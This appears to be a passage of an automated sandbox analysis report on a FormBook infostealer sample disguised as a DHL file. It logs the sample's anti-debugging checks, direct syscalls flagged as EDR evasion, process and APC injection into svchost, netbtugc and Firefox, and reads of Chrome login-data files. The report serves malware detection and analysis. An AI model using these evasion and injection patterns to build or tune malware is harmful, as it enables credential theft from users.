Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104A80 mov eax, dword ptr fs:[00000030h]	2_2_03104A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03068A90 mov edx, dword ptr fs:[00000030h]	2_2_03068A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h]	2_2_03038AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h]	2_2_03038AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03086AA4 mov eax, dword ptr fs:[00000030h]	2_2_03086AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]	2_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]	2_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]	2_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030AD0 mov eax, dword ptr fs:[00000030h]	2_2_03030AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h]	2_2_03064AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h]	2_2_03064AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h]	2_2_0306AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h]	2_2_0306AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h]	2_2_030AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h]	2_2_030AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BC912 mov eax, dword ptr fs:[00000030h]	2_2_030BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03028918 mov eax, dword ptr fs:[00000030h]	2_2_03028918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03028918 mov eax, dword ptr fs:[00000030h]	2_2_03028918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B892A mov eax, dword ptr fs:[00000030h]	2_2_030B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C892B mov eax, dword ptr fs:[00000030h]	2_2_030C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B0946 mov eax, dword ptr fs:[00000030h]	2_2_030B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104940 mov eax, dword ptr fs:[00000030h]	2_2_03104940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]	2_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]	2_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]	2_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]	2_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0307096E mov edx, dword ptr fs:[00000030h]	2_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]	2_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h]	2_2_030D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h]	2_2_030D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BC97C mov eax, dword ptr fs:[00000030h]	2_2_030BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030309AD mov eax, dword ptr fs:[00000030h]	2_2_030309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030309AD mov eax, dword ptr fs:[00000030h]	2_2_030309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B89B3 mov esi, dword ptr fs:[00000030h]	2_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h]	2_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h]	2_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C69C0 mov eax, dword ptr fs:[00000030h]	2_2_030C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030649D0 mov eax, dword ptr fs:[00000030h]	2_2_030649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_030FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_030BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h]	2_2_030629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h]	2_2_030629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BC810 mov eax, dword ptr fs:[00000030h]	2_2_030BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]	2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]	2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]	2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052835 mov ecx, dword ptr fs:[00000030h]	2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]	2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]	2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A830 mov eax, dword ptr fs:[00000030h]	2_2_0306A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D483A mov eax, dword ptr fs:[00000030h]	2_2_030D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D483A mov eax, dword ptr fs:[00000030h]	2_2_030D483A

Source: C:\Users\user\Desktop\DHL 745-12302024.exe

Code function: 0_2_00AC0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_00AC0B62

Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00A92622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00A92622
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00A8083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00A8083F
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00A809D5 SetUnhandledExceptionFilter,	0_2_00A809D5
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00A80C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00A80C21

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	NtProtectVirtualMemory: Direct from: 0x77542F9C	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	NtSetInformationProcess: Direct from: 0x77542C5C	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	NtOpenKeyEx: Direct from: 0x77542B9C	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	NtProtectVirtualMemory: Direct from: 0x77537B2E	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	NtCreateFile: Direct from: 0x77542FEC	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	NtOpenFile: Direct from: 0x77542DCC	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	NtQueryInformationToken: Direct from: 0x77542CAC	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	NtTerminateThread: Direct from: 0x77542FCC	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	NtDeviceIoControlFile: Direct from: 0x77542AEC	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	NtQueryValueKey: Direct from: 0x77542BEC	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	NtQueryVolumeInformationFile: Direct from: 0x77542F2C	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	NtOpenSection: Direct from: 0x77542E0C	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	NtAllocateVirtualMemory: Direct from: 0x775448EC	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	NtSetInformationThread: Direct from: 0x775363F9	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	NtQuerySystemInformation: Direct from: 0x775448CC	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	NtClose: Direct from: 0x77542B6C
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	NtReadVirtualMemory: Direct from: 0x77542E8C	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	NtCreateKey: Direct from: 0x77542C6C	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	NtSetInformationThread: Direct from: 0x77542B4C	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	NtQueryAttributesFile: Direct from: 0x77542E6C	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	NtOpenKeyEx: Direct from: 0x77543C9C	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	NtCreateUserProcess: Direct from: 0x7754371C	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	NtQueryInformationProcess: Direct from: 0x77542C26	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	NtResumeThread: Direct from: 0x77542FBC	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	NtWriteVirtualMemory: Direct from: 0x7754490C	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	NtDelayExecution: Direct from: 0x77542DDC	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	NtAllocateVirtualMemory: Direct from: 0x77542BFC	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	NtReadFile: Direct from: 0x77542ADC	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	NtQuerySystemInformation: Direct from: 0x77542DFC	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	NtResumeThread: Direct from: 0x775436AC	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	NtNotifyChangeKey: Direct from: 0x77543C2C	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	NtCreateMutant: Direct from: 0x775435CC	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	NtWriteVirtualMemory: Direct from: 0x77542E3C	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	NtMapViewOfSection: Direct from: 0x77542D1C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\netbtugc.exe

Thread register set: target process: 316

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\netbtugc.exe

Thread APC queued: target process: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\DHL 745-12302024.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2518008

Jump to behavior

Source: C:\Users\user\Desktop\DHL 745-12302024.exe

0_2_00AC1201

Source: C:\Users\user\Desktop\DHL 745-12302024.exe

Code function: 0_2_00AA2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00AA2BA5

Source: C:\Users\user\Desktop\DHL 745-12302024.exe

Code function: 0_2_00ACB226 SendInput,keybd_event,

0_2_00ACB226

Source: C:\Users\user\Desktop\DHL 745-12302024.exe

Code function: 0_2_00AE22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

0_2_00AE22DA

Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL 745-12302024.exe"	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\DHL 745-12302024.exe

0_2_00AC0B62

Source: C:\Users\user\Desktop\DHL 745-12302024.exe

Code function: 0_2_00AC1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00AC1663

Source: DHL 745-12302024.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: YtGWSBzTzAeRZwtsgUUux.exe, 00000003.00000002.3876124654.00000000011E1000.00000002.00000001.00040000.00000000.sdmp, YtGWSBzTzAeRZwtsgUUux.exe, 00000003.00000000.1500457753.00000000011E1000.00000002.00000001.00040000.00000000.sdmp, YtGWSBzTzAeRZwtsgUUux.exe, 00000008.00000000.1667439275.00000000011D1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: DHL 745-12302024.exe, YtGWSBzTzAeRZwtsgUUux.exe, 00000003.00000002.3876124654.00000000011E1000.00000002.00000001.00040000.00000000.sdmp, YtGWSBzTzAeRZwtsgUUux.exe, 00000003.00000000.1500457753.00000000011E1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: YtGWSBzTzAeRZwtsgUUux.exe, 00000003.00000002.3876124654.00000000011E1000.00000002.00000001.00040000.00000000.sdmp, YtGWSBzTzAeRZwtsgUUux.exe, 00000003.00000000.1500457753.00000000011E1000.00000002.00000001.00040000.00000000.sdmp, YtGWSBzTzAeRZwtsgUUux.exe, 00000008.00000000.1667439275.00000000011D1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: YtGWSBzTzAeRZwtsgUUux.exe, 00000003.00000002.3876124654.00000000011E1000.00000002.00000001.00040000.00000000.sdmp, YtGWSBzTzAeRZwtsgUUux.exe, 00000003.00000000.1500457753.00000000011E1000.00000002.00000001.00040000.00000000.sdmp, YtGWSBzTzAeRZwtsgUUux.exe, 00000008.00000000.1667439275.00000000011D1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\DHL 745-12302024.exe

Code function: 0_2_00A80698 cpuid

0_2_00A80698

Source: C:\Users\user\Desktop\DHL 745-12302024.exe

Code function: 0_2_00AD8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

0_2_00AD8195

Source: C:\Users\user\Desktop\DHL 745-12302024.exe

Code function: 0_2_00ABD27A GetUserNameW,

0_2_00ABD27A

Source: C:\Users\user\Desktop\DHL 745-12302024.exe

Code function: 0_2_00A9B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_00A9B952

Source: C:\Users\user\Desktop\DHL 745-12302024.exe

Code function: 0_2_00A642DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00A642DE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.2600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.2600000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3875496509.0000000002CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3875554643.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3878718272.0000000005050000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3875131699.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1591817678.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3876602708.00000000028F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1592836487.0000000003450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1591186605.0000000002600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
